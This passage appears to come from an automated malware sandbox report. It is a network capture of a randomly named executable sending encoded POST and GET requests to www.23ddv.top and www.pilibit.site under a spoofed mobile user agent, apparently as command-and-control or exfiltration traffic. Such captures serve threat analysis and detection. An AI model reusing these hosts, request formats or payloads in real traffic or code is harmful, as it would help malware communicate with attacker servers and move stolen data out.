17	192.168.2.4	58110	154.23.184.218	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:07.290770054 CEST	682	OUT	POST /74hi/ HTTP/1.1 Host: www.23ddv.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache Origin: http://www.23ddv.top Referer: http://www.23ddv.top/74hi/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 71 45 67 74 4f 57 41 64 35 2f 35 46 38 67 42 4a 75 4c 6b 47 52 57 73 6b 55 4d 39 7a 45 6b 36 7a 2f 4d 65 64 51 76 4e 57 54 70 72 54 77 33 53 70 2b 54 54 71 4a 2f 56 67 58 34 56 6c 57 7a 35 73 4b 38 64 4a 75 79 4c 4d 78 38 65 4c 54 61 69 62 65 36 77 79 61 46 49 31 5a 76 67 32 4d 51 70 72 36 6a 56 72 41 72 53 38 67 64 67 68 63 7a 69 4a 6a 4e 75 6b 64 4e 39 31 71 75 57 34 37 43 72 35 70 64 55 42 59 6f 4d 69 68 4f 6a 66 37 4b 73 72 49 59 59 7a 45 69 32 42 4e 6a 79 74 56 65 5a 50 49 6c 4f 6e 36 77 70 35 41 33 4d 4a 31 54 7a 2b 49 42 70 35 52 57 41 5a 42 4e 49 79 4a 44 65 59 73 41 3d 3d Data Ascii: ZXzt1jdX=qEgtOWAd5/5F8gBJuLkGRWskUM9zEk6z/MedQvNWTprTw3Sp+TTqJ/VgX4VlWz5sK8dJuyLMx8eLTaibe6wyaFI1Zvg2MQpr6jVrArS8gdghcziJjNukdN91quW47Cr5pdUBYoMihOjf7KsrIYYzEi2BNjytVeZPIlOn6wp5A3MJ1Tz+IBp5RWAZBNIyJDeYsA==
Aug 31, 2024 14:05:08.197376013 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 31 Aug 2024 12:05:08 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a4f874-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	58111	154.23.184.218	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:09.836461067 CEST	702	OUT	POST /74hi/ HTTP/1.1 Host: www.23ddv.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache Origin: http://www.23ddv.top Referer: http://www.23ddv.top/74hi/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 71 45 67 74 4f 57 41 64 35 2f 35 46 38 44 5a 4a 39 63 51 47 41 6d 73 6a 49 63 39 7a 66 30 36 33 2f 4d 69 64 51 75 5a 47 51 62 50 54 7a 58 43 70 35 69 54 71 4b 2f 56 67 66 59 56 6b 56 44 35 7a 4b 38 42 2f 75 32 44 4d 78 38 61 4c 54 62 53 62 65 4c 77 78 5a 31 49 37 51 50 67 6f 49 51 70 72 36 6a 56 72 41 72 47 47 67 64 6f 68 63 43 53 4a 69 76 57 72 43 39 39 79 74 75 57 34 77 69 72 39 70 64 55 7a 59 74 70 4a 68 49 2f 66 37 4b 63 72 4c 4a 59 38 4e 69 32 48 43 44 7a 34 55 4f 6b 56 49 58 66 74 77 57 35 4f 4a 46 4d 7a 30 56 69 6b 5a 77 49 75 44 57 6b 71 63 4b 42 47 45 41 6a 52 33 4d 63 37 66 33 52 78 67 70 6e 5a 42 63 36 62 36 47 47 67 58 50 55 3d Data Ascii: ZXzt1jdX=qEgtOWAd5/5F8DZJ9cQGAmsjIc9zf063/MidQuZGQbPTzXCp5iTqK/VgfYVkVD5zK8B/u2DMx8aLTbSbeLwxZ1I7QPgoIQpr6jVrArGGgdohcCSJivWrC99ytuW4wir9pdUzYtpJhI/f7KcrLJY8Ni2HCDz4UOkVIXftwW5OJFMz0VikZwIuDWkqcKBGEAjR3Mc7f3RxgpnZBc6b6GGgXPU=
Aug 31, 2024 14:05:10.759993076 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 31 Aug 2024 12:05:10 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a4f874-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	58112	154.23.184.218	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:12.383183002 CEST	10784	OUT	POST /74hi/ HTTP/1.1 Host: www.23ddv.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache Origin: http://www.23ddv.top Referer: http://www.23ddv.top/74hi/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 71 45 67 74 4f 57 41 64 35 2f 35 46 38 44 5a 4a 39 63 51 47 41 6d 73 6a 49 63 39 7a 66 30 36 33 2f 4d 69 64 51 75 5a 47 51 62 48 54 77 6b 36 70 36 46 6e 71 4c 2f 56 67 44 49 56 68 56 44 35 36 4b 38 49 32 75 32 47 35 78 2b 53 4c 54 35 71 62 59 2f 45 78 4f 46 49 37 50 66 67 31 4d 51 6f 2f 36 6a 6b 67 41 72 57 47 67 64 6f 68 63 42 61 4a 69 39 75 72 52 74 39 31 71 75 57 4f 37 43 71 69 70 64 38 6a 59 73 6f 79 68 37 6e 66 38 75 34 72 4e 36 77 38 56 79 32 46 4f 6a 79 37 55 4f 70 4c 49 58 54 50 77 57 6b 5a 4a 48 51 7a 32 42 54 6f 4e 67 63 6b 41 6e 56 35 4f 64 6b 74 43 44 43 53 35 2b 64 43 55 6e 5a 53 77 35 62 5a 4d 63 66 53 72 46 61 73 47 49 56 30 75 38 74 4b 46 67 43 4d 66 61 4f 45 74 6b 52 4d 76 47 47 37 4e 74 38 76 6b 32 35 59 7a 37 53 63 72 69 70 73 67 74 57 65 75 6a 6d 56 79 42 52 35 75 70 32 77 32 6e 6d 6d 37 44 39 56 6b 78 7a 67 69 4e 75 58 41 67 39 35 6f 51 65 5a 54 73 54 69 7a 48 76 57 6d 74 6a 38 31 31 79 4c 4f 33 78 34 63 79 37 74 77 69 79 6f 58 63 77 75 30 33 4f 46 50 [TRUNCATED] Data Ascii: ZXzt1jdX=qEgtOWAd5/5F8DZJ9cQGAmsjIc9zf063/MidQuZGQbHTwk6p6FnqL/VgDIVhVD56K8I2u2G5x+SLT5qbY/ExOFI7Pfg1MQo/6jkgArWGgdohcBaJi9urRt91quWO7Cqipd8jYsoyh7nf8u4rN6w8Vy2FOjy7UOpLIXTPwWkZJHQz2BToNgckAnV5OdktCDCS5+dCUnZSw5bZMcfSrFasGIV0u8tKFgCMfaOEtkRMvGG7Nt8vk25Yz7ScripsgtWeujmVyBR5up2w2nmm7D9VkxzgiNuXAg95oQeZTsTizHvWmtj811yLO3x4cy7twiyoXcwu03OFPQRAgO3YLMf/QLqa+nUNE/1sPJkTgjTdIjysby+Hni7JEUMWfuJxrlZe6K07cl4KQ33hgEt1cvYcUUqVSphJGbJWL6CoGuTo/vq2tD/+4wf9JF+Jc5u/PA/ALaEYaVXftbyceJ/mF367a1QzeLw2RyctyqffQBKaVeiT5w8NR2kJcD2Qax35YC7j6BZ3hblYFyXxSsiXYk1ZLF1G185G7yJIpJghr19TxwxaEcytRQKZxPQ0AG5oMNIW805DSrgOrd+ylfxv6sIxCJtX0eirzs32VlyzGS7auI8mIzs7UKlUfOL3+NA9yCDv8OLiHptQwVLPvVw/PMG7cAu8EZspci0bNKuaHidShpFTXoCZyYrJHbL0yz7AXPsIi7hBN6xvdAyHK9uqsKGqhd4d7Uapia+7R/enrSZeqXAz61hqJ1DeeffTHD7nCF8PIOqkvRk8zXPq0ROK/Wc/7JXM+jyy/DRLZGZHdHrXQoxaHdbAgaAipcEsqSxoLGVYBUnDk9aY2ZPi+RcmOUrtMplY7oi7WzVucoQmgEPUmsuwDxLIA+RcYrpIMMLZ/xp+shNaNsLcOnpxxbTc8FUho2HpoRtXNRnF1MALvr44ftJpBgT/MyjuFcFIPf+3UaDSdtOUBuKsFDqbzSCIGdo1mJFq8cKQ5t+GVk1bzqc50rH [TRUNCATED]
Aug 31, 2024 14:05:13.600126028 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 31 Aug 2024 12:05:13 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a4f874-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	58113	154.23.184.218	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:14.944926977 CEST	418	OUT	GET /74hi/?ZXzt1jdX=nGINNi176Mw32GVF7tlDMHUsDN0FLET+wtq3FMVEcbrakWyJqw7BUNhsS7t1Rgl5P/JWtiTsx+SLLpCMe4oAPWkmauoeOlVhsSF1Co6Ym9oRZTWO7OX8DvA=&fVU8=HRzx HTTP/1.1 Host: www.23ddv.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Aug 31, 2024 14:05:15.835457087 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 31 Aug 2024 12:05:15 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a4f874-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	58114	200.58.111.42	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:22.098556042 CEST	691	OUT	POST /ydsb/ HTTP/1.1 Host: www.pilibit.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache Origin: http://www.pilibit.site Referer: http://www.pilibit.site/ydsb/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 30 4f 41 48 56 4c 44 41 55 32 77 44 31 46 36 6b 46 75 42 38 31 6a 43 42 39 71 2b 5a 49 75 47 76 36 6e 56 66 4f 2b 47 75 4c 61 42 42 41 49 38 48 62 78 5a 67 75 75 45 75 6f 75 46 33 42 58 6a 49 66 53 63 30 6a 4e 37 31 59 44 4a 51 37 77 31 43 4e 47 4b 47 2b 67 33 7a 4e 4b 76 42 57 49 2f 51 71 4b 6a 67 2b 63 31 72 34 70 54 38 50 6e 30 67 41 33 79 6f 59 50 62 37 54 71 5a 6b 74 44 31 41 32 63 30 4d 45 6a 4b 6b 74 57 46 4c 70 44 52 43 77 54 58 54 47 4b 78 6b 38 37 2b 37 79 31 4f 4f 70 77 47 47 56 2b 38 62 31 57 6e 31 4a 43 7a 36 76 2f 61 74 44 68 6f 72 43 30 48 4d 4b 7a 31 70 65 77 3d 3d Data Ascii: ZXzt1jdX=0OAHVLDAU2wD1F6kFuB81jCB9q+ZIuGv6nVfO+GuLaBBAI8HbxZguuEuouF3BXjIfSc0jN71YDJQ7w1CNGKG+g3zNKvBWI/QqKjg+c1r4pT8Pn0gA3yoYPb7TqZktD1A2c0MEjKktWFLpDRCwTXTGKxk87+7y1OOpwGGV+8b1Wn1JCz6v/atDhorC0HMKz1pew==
Aug 31, 2024 14:05:23.744191885 CEST	360	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:05:22 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Aug 31, 2024 14:05:23.744415998 CEST	360	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:05:22 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Aug 31, 2024 14:05:23.744863987 CEST	360	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:05:22 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	58115	200.58.111.42	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:24.648453951 CEST	711	OUT	POST /ydsb/ HTTP/1.1 Host: www.pilibit.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache Origin: http://www.pilibit.site Referer: http://www.pilibit.site/ydsb/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 30 4f 41 48 56 4c 44 41 55 32 77 44 36 47 69 6b 4a 74 70 38 7a 44 43 43 67 61 2b 5a 64 2b 47 30 36 6e 5a 66 4f 37 6e 31 4b 6f 6c 42 41 74 51 48 59 77 5a 67 74 75 45 75 77 2b 46 79 63 6e 6a 42 66 53 5a 44 6a 4d 48 31 59 44 64 51 37 78 46 43 4e 31 53 46 39 51 33 39 43 71 76 44 59 6f 2f 51 71 4b 6a 67 2b 63 68 42 34 70 4c 38 4f 58 45 67 41 57 79 72 62 50 62 34 57 61 5a 6b 70 44 30 4a 32 63 30 75 45 6e 72 2f 74 56 74 4c 70 44 42 43 77 6e 6a 51 4e 4b 78 69 6a 4c 2f 58 2f 31 7a 4b 73 42 2f 38 61 65 30 58 2b 32 75 58 42 6b 69 67 2b 4f 37 36 52 68 4d 59 66 7a 4f 34 48 77 49 67 46 39 55 6f 66 77 55 41 44 69 42 66 75 55 72 63 4f 39 77 59 4f 67 63 3d Data Ascii: ZXzt1jdX=0OAHVLDAU2wD6GikJtp8zDCCga+Zd+G06nZfO7n1KolBAtQHYwZgtuEuw+FycnjBfSZDjMH1YDdQ7xFCN1SF9Q39CqvDYo/QqKjg+chB4pL8OXEgAWyrbPb4WaZkpD0J2c0uEnr/tVtLpDBCwnjQNKxijL/X/1zKsB/8ae0X+2uXBkig+O76RhMYfzO4HwIgF9UofwUADiBfuUrcO9wYOgc=
Aug 31, 2024 14:05:25.353162050 CEST	360	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:05:25 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	58116	200.58.111.42	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:27.197870970 CEST	10793	OUT	POST /ydsb/ HTTP/1.1 Host: www.pilibit.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache Origin: http://www.pilibit.site Referer: http://www.pilibit.site/ydsb/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 30 4f 41 48 56 4c 44 41 55 32 77 44 36 47 69 6b 4a 74 70 38 7a 44 43 43 67 61 2b 5a 64 2b 47 30 36 6e 5a 66 4f 37 6e 31 4b 6f 74 42 41 62 45 48 62 54 42 67 6a 4f 45 75 35 65 46 7a 63 6e 69 54 66 54 39 50 6a 4d 4b 41 59 47 5a 51 34 58 78 43 63 67 2b 46 71 41 33 39 41 71 76 43 57 49 2f 42 71 4b 7a 6b 2b 63 78 42 34 70 4c 38 4f 56 4d 67 47 48 79 72 57 76 62 37 54 71 5a 6f 74 44 31 73 32 63 38 66 45 6d 72 76 74 46 4e 4c 6f 69 78 43 32 43 58 51 50 71 78 67 69 4c 2f 50 2f 31 2f 46 73 42 6a 42 61 66 78 34 2b 30 79 58 43 78 61 34 72 4e 66 73 4b 68 49 37 4e 78 2b 65 43 79 77 64 4e 63 67 6b 4f 52 77 47 63 44 46 64 73 54 2b 75 64 50 63 62 62 45 67 6f 39 47 52 45 73 77 79 4a 65 46 58 41 32 56 67 35 49 48 37 68 48 5a 2b 41 55 59 55 64 4b 68 61 6a 71 74 44 35 68 6f 78 43 77 52 31 76 5a 65 62 49 30 58 74 72 41 4f 76 4e 4e 7a 6d 44 41 50 38 74 56 31 44 58 4c 7a 34 43 48 6c 75 66 47 4c 43 31 64 6b 6f 7a 66 30 45 74 39 67 75 74 6a 69 68 37 41 48 32 54 6b 35 37 6b 41 4d 63 34 30 30 61 34 6b [TRUNCATED] Data Ascii: ZXzt1jdX=0OAHVLDAU2wD6GikJtp8zDCCga+Zd+G06nZfO7n1KotBAbEHbTBgjOEu5eFzcniTfT9PjMKAYGZQ4XxCcg+FqA39AqvCWI/BqKzk+cxB4pL8OVMgGHyrWvb7TqZotD1s2c8fEmrvtFNLoixC2CXQPqxgiL/P/1/FsBjBafx4+0yXCxa4rNfsKhI7Nx+eCywdNcgkORwGcDFdsT+udPcbbEgo9GREswyJeFXA2Vg5IH7hHZ+AUYUdKhajqtD5hoxCwR1vZebI0XtrAOvNNzmDAP8tV1DXLz4CHlufGLC1dkozf0Et9gutjih7AH2Tk57kAMc400a4khRLn1sFDTdmW9HInjP3poQ8z+7jSlJe5ArT8LafwNfofT/9mPaHQh7q+ggq6soeDYm0KFig0MUt56AiasWIz+KAhw9y1cG/YlIhO8PSkwcxTb1HNHOiBddYgsbDilmYhYWuVtydcSHHU7u16yqtUzS2odXd0N+nVryiWdg/6/cXyxZHjA+JbVezpkh17yZKGiIGpa7bXYZFxzpYET+dmRmnVruOdyeouDVVqDzungSGmqYPyNNhhIbWqeJhL0MJm+lzzvR0MGt50hpyITxz+ZGyECjSVkCXxMiTHFCLXvdOz2N7bbdnnO35wAfceAXcH1Go8Uoy0b4dsCZubwsP/QTBRGRn6AXvS0KcAru4oHkiAg6bBWC74iNDed9LlHqKHW3YOUHtxRDgxG1v3x4zaHkl91BuWkSxclhCLwbBFa+jwQNYpBa0MqcCjAAEo/Z/w5UGQyqmGQks35tHZVrrmf/1KX44tZGCTqmch6JseI5FkxVdTnoM9P1Uv1DOaPzG3YmTIe6tiEEQQI449K7SCEsABiFe0+Ix6jnBNwBHgAcGwJdlwxB3EAW/TXOjXFnwE5smypEtjoICL8mExX19Q36slFUUXi0BressRdH8ydmHjOtEHsjXygp0bwLv+HNMz0wtbfpeGlSk1e7wUz4GXmFQTaCxikUUDm4 [TRUNCATED]
Aug 31, 2024 14:05:27.929392099 CEST	360	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:05:27 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this 